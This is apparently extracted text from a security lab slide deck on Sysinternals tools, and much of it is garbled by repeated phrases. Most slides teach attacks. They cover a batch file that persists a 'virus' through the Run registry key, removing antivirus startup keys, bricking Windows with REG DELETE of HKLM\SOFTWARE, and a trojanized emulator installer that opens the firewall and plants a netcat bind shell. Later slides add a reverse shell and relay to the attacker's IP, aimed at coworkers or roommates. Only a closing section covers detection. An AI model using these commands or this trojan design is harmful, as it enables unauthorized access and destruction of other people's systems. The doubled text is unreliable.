System Monitoring with Sys-Internals

System Monitoring with Sys-System Monitoring with Sys-Internals Internals

http://www.sys-internals.comhttp://www.sys-internals.com

Section 1: Registry Section 1: Registry Manipulation and Having Evil Manipulation and Having Evil

fun.fun. RegistryRegistry

- Part of windows containing program - Part of windows containing program info.info.- System settings stored in registry- System settings stored in registry- Replaced old startup systems- Replaced old startup systems

(Autoexec.bat, ini files)(Autoexec.bat, ini files)- Essential to Windows operation- Essential to Windows operation

StructureStructure- registry divided into hives- registry divided into hives- like a folder hierarchy - like a folder hierarchy - keys located in lower levels of hives- keys located in lower levels of hives

Parts of the RegisryParts of the Regisry HKEY_CURRENT_USER HKEY_CURRENT_USER

- information and profile of current user - information and profile of current user HKEY_USERS HKEY_USERS

- user profiles- user profiles HKEY_LOCAL_MACHINE HKEY_LOCAL_MACHINE

- configuration information particular to the - configuration information particular to the computercomputer

HKEY_CLASSES_ROOT HKEY_CLASSES_ROOT

- subclass of LOCAL_MACHINE: stores program - subclass of LOCAL_MACHINE: stores program informationinformation

HKEY_CURRENT_CONFIG HKEY_CURRENT_CONFIG

- hardware profiles- hardware profiles

SoftwareSoftware RegeditRegedit

- Built into windows- Built into windows- GUI registry modifyer- GUI registry modifyer

RegmonRegmon- Sys-internal that will monitors all registry - Sys-internal that will monitors all registry accesses and activities. accesses and activities. - Has filtering capabilities- Has filtering capabilities- Will be used to detect malicious keys and their - Will be used to detect malicious keys and their functionfunction

Batch FilesBatch Files- Can combine commands into simple program- Can combine commands into simple program

Jetico FirewallJetico Firewall- For simple key demonstration- For simple key demonstration

Structure of a KeyStructure of a Key

Name | Type | DataName | Type | Data

Appears like this in RegeditAppears like this in Regedit

Modifying KeysModifying Keys

1) Adding a key:1) Adding a key: REG ADD RegistryPath /V Name /d REG ADD RegistryPath /V Name /d

Data Data

2) Modifying an existing key:2) Modifying an existing key: REG UPDATE RegistryPath /V Name /d REG UPDATE RegistryPath /V Name /d

Data Data 3) Deleting a key: 3) Deleting a key: REG DELETE RegistryPath [/FORCE] REG DELETE RegistryPath [/FORCE]

Lab SituationLab Situation

Virus gets installed on a systemVirus gets installed on a system User deletes the virus, but on restart User deletes the virus, but on restart

virus comes backvirus comes back One way a hacker can do this is via One way a hacker can do this is via

the registrythe registry The following key location contains The following key location contains

startup program information:startup program information: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\RunCurrentVersion\Run

Startup Program ExamplesStartup Program Examples

Re-installationRe-installation

Batch File: Infect.batBatch File: Infect.bat Infect.bat and virus on system in hidden Infect.bat and virus on system in hidden

folder.folder. Infect.bat copies virus to Windows, Infect.bat copies virus to Windows,

renames it to MrMalicious, and runs it. renames it to MrMalicious, and runs it. User sees virus in task manager, User sees virus in task manager,

searches hard drive and deletes searches hard drive and deletes MrMalicious, thinking he or she is da MrMalicious, thinking he or she is da bomb. bomb.

Uh-OhUh-Oh

Infect.bat re-infects the system on Infect.bat re-infects the system on startup because of startup registry key.startup because of startup registry key.

Hidden viral file is still on system. Hidden viral file is still on system. MrMalicious comes backMrMalicious comes back User is not da bombUser is not da bomb

Note: MrMalicious for this lab just takes Note: MrMalicious for this lab just takes up CPU time and runs in the up CPU time and runs in the background. background.

Viral CodeViral Code

reg add HKEY_LOCAL_MACHINE\SOFTWARE\reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Process Microsoft\Windows\CurrentVersion\Run /v Process /d "C:\WINDOWS\HiddenFolder\Infect.bat"/d "C:\WINDOWS\HiddenFolder\Infect.bat"

MD "C:\WINDOWS\HiddenFolder\"MD "C:\WINDOWS\HiddenFolder\"copy Infect.bat "C:\WINDOWS\HiddenFolder\"copy Infect.bat "C:\WINDOWS\HiddenFolder\"copy RenameMe.exe "C:\WINDOWS\HiddenFolder\"copy RenameMe.exe "C:\WINDOWS\HiddenFolder\"copy RenameMe.exe "C:\Windows\HiddenFolder\"copy RenameMe.exe "C:\Windows\HiddenFolder\"cd "C:\Windows"cd "C:\Windows"Ren RenameMe.exe "MrMalicious.exe"Ren RenameMe.exe "MrMalicious.exe"Start MrMalicious.exeStart MrMalicious.exeexitexit

Turning off Turning off Antivirus/FirewallsAntivirus/Firewalls

Before going over detection, we will Before going over detection, we will examine how to turn off important examine how to turn off important anti-viral programs.anti-viral programs.

Wouldn’t it be nice not to have to Wouldn’t it be nice not to have to deal with a victim’s firewall?deal with a victim’s firewall?

Removal of Startup Removal of Startup programsprograms

Simple ProcessSimple Process1.1. Delete all startup keys manually on Delete all startup keys manually on

hacker systemhacker system2.2. Backup key folder by exportingBackup key folder by exporting3.3. Have virus replace startup folder with Have virus replace startup folder with

empty backup.empty backup. Running registry backups (.reg) will Running registry backups (.reg) will

replace keys in the current locationreplace keys in the current location Could also use query command in Could also use query command in

software to remove all keys with string software to remove all keys with string “norton” or “zonealarm” in specified hive“norton” or “zonealarm” in specified hive

DetectionDetection

Regmon: GUI based registry loggerRegmon: GUI based registry logger Lots of registry accesses/second on Lots of registry accesses/second on

windows systemwindows system Typical program install requires Typical program install requires

150,000 registry accesses. 150,000 registry accesses. How can we find malicious keys with How can we find malicious keys with

so many reads/writes to registry?so many reads/writes to registry?

Regmon FilteringRegmon Filtering

Filtering Cont’dFiltering Cont’d

User can filter out normal processes User can filter out normal processes such as Explorer.exe, svchost, etc. such as Explorer.exe, svchost, etc.

Logged entries can be cut down to Logged entries can be cut down to just a few hundred. just a few hundred.

Now easier to find where malicious Now easier to find where malicious keys have been added. keys have been added.

Evil Fun Time: Disable OSEvil Fun Time: Disable OS

Registry is key to operation of Registry is key to operation of windowswindows

Unfortunately, can be easily modified Unfortunately, can be easily modified to make windows unstable and to make windows unstable and unbootableunbootable

Easy way to make enemiesEasy way to make enemies

Not fun for victim machineNot fun for victim machine

“ “REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE /FORCE”/FORCE”

==

Recovery from Reg deletionRecovery from Reg deletion System not bootable even in safe mode after System not bootable even in safe mode after

previous line of code is run!!!previous line of code is run!!! In order to recover normal program operation, In order to recover normal program operation,

must have a backup copy of whole registrymust have a backup copy of whole registry Without backup copy, all programs not included Without backup copy, all programs not included

on Windows installation CD must be re-installedon Windows installation CD must be re-installed Advice: Start backing up your registryAdvice: Start backing up your registry Erunt is software that can back up and re-insert Erunt is software that can back up and re-insert

the whole registry easilythe whole registry easilyhttp://www.snapfiles.com/download/dlerunt.htmlhttp://www.snapfiles.com/download/dlerunt.html

The Windows XP SP2 The Windows XP SP2 FirewallFirewall

Poking holes in the Firewall Poking holes in the Firewall from the command linefrom the command line

netsh firewall show portopeningnetsh firewall show portopening

Poking holes in the Firewall Poking holes in the Firewall from the command line cont.from the command line cont.

What happens when we try to use What happens when we try to use Netcat to listen on a closed port?Netcat to listen on a closed port?

Poking holes in the Firewall Poking holes in the Firewall from the command line cont.from the command line cont.

If set to not allow exceptions, reset the If set to not allow exceptions, reset the firewall to default– C:\netsh firewall resetfirewall to default– C:\netsh firewall reset

Firewall default allows exceptionsFirewall default allows exceptions After exceptions are allowed, add After exceptions are allowed, add

desired exceptiondesired exception C:\netsh firewall add portopening C:\netsh firewall add portopening

protocol = ALL port = 8633 name = nc protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = mode = ENABLE scope = ALL profile = ALLALL

Hypothetical ScenarioHypothetical Scenario

let us pretend we are a hacker with let us pretend we are a hacker with not so pleasant intentions operating not so pleasant intentions operating from a RedHat 7.2 machine. The from a RedHat 7.2 machine. The Windows XP machine is being Windows XP machine is being operated by either a Co-worker, operated by either a Co-worker, schoolmate, roommate, or anyone schoolmate, roommate, or anyone you can think of that would be found you can think of that would be found on the same network as you (i.e. no on the same network as you (i.e. no router is separating you). router is separating you).

Hypothetical Scenario cont.Hypothetical Scenario cont.

Suppose we give our friend the Suppose we give our friend the Windows XP user, a self extracting Windows XP user, a self extracting Zip program that installs the ZSNES Zip program that installs the ZSNES Super Nintendo Emulator. Super Nintendo Emulator. Unfortunatley for the Windows XP Unfortunatley for the Windows XP user, we have also made it so this user, we have also made it so this self extracting zip installs netcat, and self extracting zip installs netcat, and runs a c program we wrote named runs a c program we wrote named installer.exe.installer.exe.

Installer.cInstaller.c

How the 8633 Exploit worksHow the 8633 Exploit works

9 system calls9 system calls The first system call moves an .exe The first system call moves an .exe

called process to c:\Windows\called process to c:\Windows\system32system32

The second call executes process – k The second call executes process – k nc.exe, this process kills all instances nc.exe, this process kills all instances of Netcat in case the exploit has of Netcat in case the exploit has already been run on this machine so already been run on this machine so as not to cause an erroras not to cause an error

How the 8633 Exploit works How the 8633 Exploit works cont.cont.

The third call moves nc.exe to C:\The third call moves nc.exe to C:\Windows\system32, nc.exe is Netcat!Windows\system32, nc.exe is Netcat!

The fourth call moves server.exe to The fourth call moves server.exe to C:\Windows\system32C:\Windows\system32

The fifth call resets the Windows The fifth call resets the Windows firewall in case it is set to not allow firewall in case it is set to not allow any exceptions, c:\netsh firewall any exceptions, c:\netsh firewall resetreset

How the 8633 Exploit works How the 8633 Exploit works cont.cont.

The sixth system call is “C:\netsh firewall The sixth system call is “C:\netsh firewall add portopening protocol = ALL port = add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = 8633 name = nc mode = ENABLE scope = ALL profile = ALL” , which opens up the ALL profile = ALL” , which opens up the firewall on port 8633 for Netcat.firewall on port 8633 for Netcat.

The seventh system call, “reg add hklm\The seventh system call, “reg add hklm\SOFTWARE\Microsoft\Windows\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f”, adds c:\windows\system32\server.exe /f”, adds a key to the registry allowing server.exe to a key to the registry allowing server.exe to run whenever the computer is booted. run whenever the computer is booted.

Changing the Registry to run a Changing the Registry to run a program when starting program when starting

WindowsWindows The Windows XP registry has six registry keys designated for launching The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are:programs when starting up the computer. They are:

HKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\Run - Launches program when specific user logs in- Launches program when specific user logs in HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce - Launches program when specific user logs in next time, then is removed from - Launches program when specific user logs in next time, then is removed from

thethe registryregistry HKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\Run - Launches program automatically at system startup * (key modified by - Launches program automatically at system startup * (key modified by

installer.c)installer.c) HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce - Launches program automatically at system startup on next startup, then is- Launches program automatically at system startup on next startup, then is Removed from the registry.Removed from the registry. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesHKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Launches service automatically at system startup (e.g. AIM)- Launches service automatically at system startup (e.g. AIM) HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - Launches service automatically at system startup on next startup, then is- Launches service automatically at system startup on next startup, then is - Removed from the registry.- Removed from the registry.

How the 8633 Exploit works How the 8633 Exploit works cont.cont.

The Eighth system call runs Netcat. The Eighth system call runs Netcat. Because Netcat is run by nc.exe Because Netcat is run by nc.exe executable, it is difficult to run so the executable, it is difficult to run so the command prompt will close - command prompt will close - system("start /d \"c:\\windows\\system("start /d \"c:\\windows\\system32\\\" nc -L -p 8633 -e system32\\\" nc -L -p 8633 -e cmd.exe -d");cmd.exe -d");

The Ninth system call is just an exit The Ninth system call is just an exit command needed to close a second command needed to close a second instance of the cmd shell.instance of the cmd shell.

Server.cServer.c

What server.exe does and What server.exe does and what Netcat is doingwhat Netcat is doing

Server.exe was added to the registry to run Server.exe was added to the registry to run every time the system boots by installer.exe. every time the system boots by installer.exe. Everytime the system is restarted, Netcat Everytime the system is restarted, Netcat runs listening on the port 8633 and shells to runs listening on the port 8633 and shells to cmd.exe when it is connected to by netcat cmd.exe when it is connected to by netcat from another machine.from another machine.

Netcat is run with the –L and –d options so Netcat is run with the –L and –d options so that it runs in silent mode, and opens itself that it runs in silent mode, and opens itself back up in listening mode when back up in listening mode when disconnected.disconnected.

C:\nc -L –p 8633 –e cmd.exe -dC:\nc -L –p 8633 –e cmd.exe -d

Files in the Zip file, and Files in the Zip file, and creating the self extractorcreating the self extractor

Going back to the Hypothetical Going back to the Hypothetical scenarioscenario

Thinking he is in for an exciting afternoon of Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly playing Super Mario World, and possibly even a little Ogre Battle, the unsuspecting even a little Ogre Battle, the unsuspecting Windows XP user is more than happy to Windows XP user is more than happy to take and install the emulator you give him. take and install the emulator you give him. After he installs it, you have administrative After he installs it, you have administrative access to his machine, for as long is you are access to his machine, for as long is you are on the same network with him (assuming he on the same network with him (assuming he is not extremely knowledgeable of his is not extremely knowledgeable of his Registry, or Firewall, or doesn’t decide to Registry, or Firewall, or doesn’t decide to format his hard drive).format his hard drive).

How to access Our friend the How to access Our friend the Windows XP users computerWindows XP users computer

Since Netcat is listening on his Since Netcat is listening on his computer when ever the computer is computer when ever the computer is on, with the command C:\nc –L –p 8633 on, with the command C:\nc –L –p 8633 –e cmd.exe – d–e cmd.exe – d

All we have to do is run nc x.x.x.x All we have to do is run nc x.x.x.x 8633, where x.x.x.x is his i.p adress 8633, where x.x.x.x is his i.p adress and we have access.and we have access.

Us having accessUs having access

Why Port 8633Why Port 8633

Because Spelling out TODD Because Spelling out TODD numerically on cell phones etc, is numerically on cell phones etc, is done by 8-6-3-3done by 8-6-3-3

TODD is my name, and I came up TODD is my name, and I came up with this paticular exploit, and I had with this paticular exploit, and I had to pick a port so why not 8633to pick a port so why not 8633

A new ScenarioA new Scenario

Suppose we want to gain access to Suppose we want to gain access to our friend the Windows XP user’s our friend the Windows XP user’s computer (Who by the way is computer (Who by the way is probably not our friend, otherwise we probably not our friend, otherwise we wouldn’t be continuously hacking his wouldn’t be continuously hacking his computer), and this time he is not on computer), and this time he is not on the same network as we are. the same network as we are.

A new Scenario cont.A new Scenario cont.

In order to do this, we will edit our code In order to do this, we will edit our code slightly from the previous exploit. Rather slightly from the previous exploit. Rather than having the Windows user in listening than having the Windows user in listening mode, we will put our Linux machine in mode, we will put our Linux machine in listen mode and have his machine seek listen mode and have his machine seek out a connection with us. In both server.c, out a connection with us. In both server.c, and installer.c we will change and installer.c we will change

“ “c:\nc –L –p 8633 –e cmd.exe –d” to c:\nc –L –p 8633 –e cmd.exe –d” to

“ “c:\nc “our_i.p.” 80 –e cmd.exe –d”c:\nc “our_i.p.” 80 –e cmd.exe –d”

A new Scenario cont.A new Scenario cont.

Make sure our router is set to forward the Make sure our router is set to forward the traffic coming into port 80 to our machine.traffic coming into port 80 to our machine.

Then we initialize our machine in listen Then we initialize our machine in listen mode, with the command: mode, with the command:

#nc –vv –l –p 80#nc –vv –l –p 80

Then we wait Then we wait

Finally The waiting pays offFinally The waiting pays off

One final example One final example

Running commands from one port Running commands from one port and recieveing on anotherand recieveing on another

We can use Netcat to send We can use Netcat to send commands through the cmd.exe commands through the cmd.exe shell, takeing commands in from one shell, takeing commands in from one port and sending them out anotherport and sending them out another

One final example cont.One final example cont.

Setting up two listening ports on your Setting up two listening ports on your machine machine

nc –vv –l –p 80nc –vv –l –p 80 nc –vv –l –p 25nc –vv –l –p 25 Then on the Windows machine run “nc Then on the Windows machine run “nc

x.x.x.x 80 | cmd.exe | nc x.x.x.x 25” where x.x.x.x 80 | cmd.exe | nc x.x.x.x 25” where x.x.x.x is your ip adress.x.x.x.x is your ip adress.

This allows you to run commands from port This allows you to run commands from port 80 and receive the results from port 2580 and receive the results from port 25

One final example cont.One final example cont.

Section 4: Unleashing a Wild Section 4: Unleashing a Wild BoarBoar

Active Monitoring ToolsActive Monitoring Tools– Process ExplorerProcess Explorer

Activity LoggingActivity Logging– Registry MonitoringRegistry Monitoring– File MonitoringFile Monitoring– Network Monitoring Network Monitoring

Stack CallStack Call Logging TrafficLogging Traffic

Process ExplorerProcess Explorer

Process ExplorerProcess Explorer– Show CPU/Memory usageShow CPU/Memory usage– Show active network portsShow active network ports– Show process threadsShow process threads

Process ExplorerProcess Explorer

EtherealEthereal

Logs network trafficLogs network traffic– Become familiar with extracting TCP flowsBecome familiar with extracting TCP flows

EtherealEthereal

EtherealEthereal

Registry/File MonitoringRegistry/File Monitoring

The File Monitoring Utilities is a clone of the The File Monitoring Utilities is a clone of the Registry Monitoring Utility.Registry Monitoring Utility.– What can you see?What can you see?

Process NameProcess Name Open & ClosesOpen & Closes Read & WriteRead & Write Attempts & FailuresAttempts & Failures

File MonitoringFile Monitoring

Network Stack MonitoringNetwork Stack Monitoring

The EndThe End